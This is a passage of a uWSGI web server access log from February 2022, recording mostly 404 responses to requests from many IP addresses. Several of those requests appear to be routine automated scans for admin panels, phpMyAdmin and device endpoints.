in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1379/1600] 183.71.240.93 () {36 vars in 699 bytes} [Wed Feb 16 00:12:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1380/1601] 106.15.192.48 () {34 vars in 459 bytes} [Wed Feb 16 00:24:02 2022] GET / => generated 179 bytes in 1 
msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1381/1602] 203.205.29.96 () {32 vars in 463 bytes} [Wed Feb 16 00:50:34 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1382/1603] 1.12.224.77 () {44 vars in 747 bytes} [Wed Feb 16 01:17:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1383/1604] 185.180.143.8 () {34 vars in 487 bytes} [Wed Feb 16 01:22:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1384/1605] 185.180.143.8 () {34 vars in 511 bytes} [Wed Feb 16 01:22:22 2022] GET /showLogin.cc => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1385/1606] 167.94.145.60 () {28 vars in 310 bytes} [Wed Feb 16 01:28:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1386/1607] 167.94.145.60 () {34 vars in 442 bytes} [Wed Feb 16 01:28:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1387/1608] 85.202.169.88 () {40 vars in 567 bytes} [Wed Feb 16 01:35:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1388/1609] 192.241.211.230 () {34 vars in 395 bytes} [Wed Feb 16 01:59:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1389/1610] 128.14.133.58 () {34 vars in 487 bytes} [Wed Feb 16 02:01:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1390/1611] 71.6.232.4 () {34 vars in 484 bytes} [Wed Feb 16 
02:25:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1391/1612] 128.14.209.170 () {34 vars in 488 bytes} [Wed Feb 16 02:38:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1392/1613] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 16 04:59:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1393/1614] 172.105.161.246 () {34 vars in 501 bytes} [Wed Feb 16 05:00:31 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1394/1615] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 16 06:42:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1395/1616] 39.103.165.99 () {32 vars in 501 bytes} [Wed Feb 16 07:13:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1396/1617] 184.105.247.194 () {28 vars in 309 bytes} [Wed Feb 16 07:59:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1397/1618] 213.87.96.96 () {32 vars in 462 bytes} [Wed Feb 16 08:04:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1398/1619] 66.240.236.116 () {34 vars in 394 bytes} [Wed Feb 16 08:15:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1399/1620] 192.241.210.236 () {34 vars in 425 bytes} [Wed Feb 16 08:51:18 2022] GET /actuator/health => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 
1400/1621] 2.57.121.10 () {28 vars in 336 bytes} [Wed Feb 16 09:06:50 2022] GET /admin/config.php => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 341 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1401/1622] 192.241.214.42 () {34 vars in 406 bytes} [Wed Feb 16 09:21:58 2022] GET /hudson => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1402/1623] 128.14.133.58 () {34 vars in 487 bytes} [Wed Feb 16 09:51:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1403/1624] 183.136.225.56 () {34 vars in 456 bytes} [Wed Feb 16 09:52:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1404/1625] 136.144.41.117 () {40 vars in 568 bytes} [Wed Feb 16 10:24:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1405/1626] 35.233.62.116 () {42 vars in 564 bytes} [Wed Feb 16 10:53:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1406/1627] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 16 11:07:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1407/1628] 128.14.141.34 () {34 vars in 487 bytes} [Wed Feb 16 12:02:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1408/1629] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 16 12:42:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1409/1630] 5.133.175.220 () {28 vars in 307 bytes} [Wed Feb 16 13:32:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 
158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1410/1631] 185.180.143.7 () {34 vars in 487 bytes} [Wed Feb 16 13:47:52 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1411/1632] 183.136.225.14 () {34 vars in 459 bytes} [Wed Feb 16 14:32:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1412/1633] 159.192.192.21 () {32 vars in 464 bytes} [Wed Feb 16 14:32:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1413/1634] 183.136.225.14 () {36 vars in 520 bytes} [Wed Feb 16 14:32:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1414/1635] 183.136.225.14 () {36 vars in 542 bytes} [Wed Feb 16 14:32:47 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1415/1636] 183.136.225.14 () {36 vars in 540 bytes} [Wed Feb 16 14:33:05 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1416/1637] 104.199.90.45 () {42 vars in 732 bytes} [Wed Feb 16 14:49:19 2022] POST /Api/Session => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1417/1638] 193.118.53.202 () {34 vars in 488 bytes} [Wed Feb 16 15:48:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1418/1639] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 16 16:12:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1419/1640] 103.111.88.237 () {32 vars in 465 bytes} [Wed Feb 16 
16:51:16 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1420/1641] 104.244.78.190 () {28 vars in 311 bytes} [Wed Feb 16 18:06:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1421/1642] 104.244.78.190 () {40 vars in 672 bytes} [Wed Feb 16 18:06:19 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1422/1643] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 16 18:31:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1423/1644] 124.121.110.239 () {34 vars in 517 bytes} [Wed Feb 16 18:40:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1424/1645] 106.15.199.114 () {34 vars in 604 bytes} [Wed Feb 16 19:18:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1425/1646] 106.15.199.114 () {34 vars in 650 bytes} [Wed Feb 16 19:18:57 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1426/1647] 106.15.199.114 () {34 vars in 616 bytes} [Wed Feb 16 19:18:57 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1427/1648] 106.15.199.114 () {34 vars in 653 bytes} [Wed Feb 16 19:18:57 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 6 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1428/1649] 106.15.199.114 () {36 vars in 713 bytes} [Wed Feb 16 19:18:57 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1429/1650] 106.15.199.114 () {36 vars in 715 bytes} [Wed Feb 16 19:18:57 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1430/1651] 106.15.199.114 () {36 vars in 745 bytes} [Wed Feb 16 19:18:57 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1431/1652] 106.15.199.114 () {36 vars in 725 bytes} [Wed Feb 16 19:18:57 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1432/1653] 106.15.199.114 () {36 vars in 743 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1433/1654] 106.15.199.114 () {36 vars in 783 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1434/1655] 106.15.199.114 () {36 vars in 753 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 99/1656] 106.15.199.114 () {36 vars in 749 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 100/1657] 106.15.199.114 () {36 vars in 761 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 101/1658] 106.15.199.114 () {36 vars in 781 bytes} [Wed Feb 16 19:18:57 2022] GET 
/static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 102/1659] 106.15.199.114 () {36 vars in 745 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 103/1660] 106.15.199.114 () {36 vars in 749 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1435/1661] 106.15.199.114 () {36 vars in 715 bytes} [Wed Feb 16 19:18:58 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1436/1662] 106.15.199.114 () {36 vars in 715 bytes} [Wed Feb 16 19:18:58 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1437/1663] 106.15.199.114 () {36 vars in 701 bytes} [Wed Feb 16 19:18:58 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1438/1664] 106.14.171.157 () {38 vars in 646 bytes} [Wed Feb 16 20:05:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1439/1665] 106.14.171.157 () {38 vars in 692 bytes} [Wed Feb 16 20:05:48 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1440/1666] 106.14.171.157 () {38 vars in 658 bytes} [Wed Feb 16 20:05:48 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1441/1667] 106.14.171.157 () {38 vars in 695 bytes} [Wed Feb 16 20:05:48 2022] GET 
/admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1442/1668] 106.14.171.157 () {40 vars in 755 bytes} [Wed Feb 16 20:05:49 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1443/1669] 106.14.171.157 () {40 vars in 757 bytes} [Wed Feb 16 20:05:49 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1444/1670] 106.14.171.157 () {40 vars in 787 bytes} [Wed Feb 16 20:05:49 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1445/1671] 106.14.171.157 () {40 vars in 767 bytes} [Wed Feb 16 20:05:49 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1446/1672] 106.14.171.157 () {40 vars in 757 bytes} [Wed Feb 16 20:05:49 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1447/1673] 106.14.171.157 () {40 vars in 757 bytes} [Wed Feb 16 20:05:49 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 5/1674] 106.14.171.157 () {40 vars in 743 bytes} [Wed Feb 16 20:05:49 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1448/1675] 192.53.160.38 () {34 vars in 413 bytes} [Wed Feb 16 20:07:52 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1449/1676] 106.14.214.22 () {38 vars in 645 bytes} [Wed Feb 16 20:22:33 2022] GET / => generated 179 bytes in 1 
msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1450/1677] 106.14.214.22 () {38 vars in 691 bytes} [Wed Feb 16 20:22:33 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1451/1678] 106.14.214.22 () {38 vars in 657 bytes} [Wed Feb 16 20:22:33 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1452/1679] 106.14.214.22 () {38 vars in 694 bytes} [Wed Feb 16 20:22:33 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1453/1680] 106.14.214.22 () {40 vars in 754 bytes} [Wed Feb 16 20:22:33 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1454/1681] 106.14.214.22 () {40 vars in 756 bytes} [Wed Feb 16 20:22:33 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1455/1682] 106.14.214.22 () {40 vars in 786 bytes} [Wed Feb 16 20:22:33 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1456/1683] 106.14.214.22 () {40 vars in 766 bytes} [Wed Feb 16 20:22:33 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1457/1684] 106.14.214.22 () {40 vars in 756 bytes} [Wed Feb 16 20:22:33 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1458/1685] 106.14.214.22 () {40 vars in 756 bytes} [Wed Feb 16 20:22:33 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1459/1686] 106.14.214.22 () {40 vars in 742 bytes} [Wed Feb 16 20:22:33 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1460/1687] 106.14.126.66 () {38 vars in 645 bytes} [Wed Feb 16 20:55:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1461/1688] 106.14.126.66 () {38 vars in 691 bytes} [Wed Feb 16 20:55:39 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1462/1689] 106.14.126.66 () {38 vars in 657 bytes} [Wed Feb 16 20:55:39 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1463/1690] 106.14.126.66 () {38 vars in 694 bytes} [Wed Feb 16 20:55:39 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1464/1691] 106.14.126.66 () {40 vars in 754 bytes} [Wed Feb 16 20:55:40 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1465/1692] 106.14.126.66 () {40 vars in 756 bytes} [Wed Feb 16 20:55:40 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1466/1693] 106.14.126.66 () {40 vars in 786 bytes} [Wed Feb 16 20:55:40 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1467/1694] 106.14.126.66 () {40 vars in 766 bytes} [Wed Feb 16 20:55:40 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) 
+[pid: 19148|app: 0|req: 1468/1695] 106.14.126.66 () {40 vars in 756 bytes} [Wed Feb 16 20:55:40 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1469/1696] 106.14.126.66 () {40 vars in 756 bytes} [Wed Feb 16 20:55:40 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1470/1697] 106.14.126.66 () {40 vars in 742 bytes} [Wed Feb 16 20:55:40 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1471/1698] 34.79.139.22 () {42 vars in 731 bytes} [Wed Feb 16 21:05:55 2022] POST /Api/Session => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1472/1699] 106.14.183.3 () {34 vars in 602 bytes} [Wed Feb 16 21:19:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 104/1700] 106.14.183.3 () {34 vars in 648 bytes} [Wed Feb 16 21:19:15 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1473/1701] 106.14.183.3 () {34 vars in 614 bytes} [Wed Feb 16 21:19:15 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1474/1702] 106.14.183.3 () {34 vars in 649 bytes} [Wed Feb 16 21:19:15 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1475/1703] 106.14.183.3 () {36 vars in 710 bytes} [Wed Feb 16 21:19:15 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1476/1704] 106.14.183.3 () {36 vars in 712 
bytes} [Wed Feb 16 21:19:15 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1477/1705] 106.14.183.3 () {36 vars in 742 bytes} [Wed Feb 16 21:19:15 2022] GET /login/img/product_logo.png => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1478/1706] 106.14.183.3 () {36 vars in 722 bytes} [Wed Feb 16 21:19:15 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1479/1707] 106.14.183.3 () {36 vars in 741 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1480/1708] 106.14.183.3 () {36 vars in 781 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 50/1709] 106.14.183.3 () {36 vars in 751 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 51/1710] 106.14.183.3 () {36 vars in 747 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 23/1711] 106.14.183.3 () {36 vars in 759 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 24/1712] 106.14.183.3 () {36 vars in 779 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches 
on core 0) +[pid: 19145|app: 0|req: 25/1713] 106.14.183.3 () {36 vars in 743 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1481/1714] 106.14.183.3 () {36 vars in 747 bytes} [Wed Feb 16 21:19:16 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1482/1715] 106.14.183.3 () {36 vars in 713 bytes} [Wed Feb 16 21:19:16 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1483/1716] 106.14.183.3 () {36 vars in 713 bytes} [Wed Feb 16 21:19:16 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1484/1717] 106.14.183.3 () {36 vars in 699 bytes} [Wed Feb 16 21:19:16 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1485/1718] 183.136.225.14 () {30 vars in 414 bytes} [Wed Feb 16 22:23:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1486/1719] 183.136.225.14 () {32 vars in 475 bytes} [Wed Feb 16 22:23:54 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1487/1720] 183.136.225.14 () {32 vars in 497 bytes} [Wed Feb 16 22:23:54 2022] GET /favicon.ico => generated 179 bytes in 1 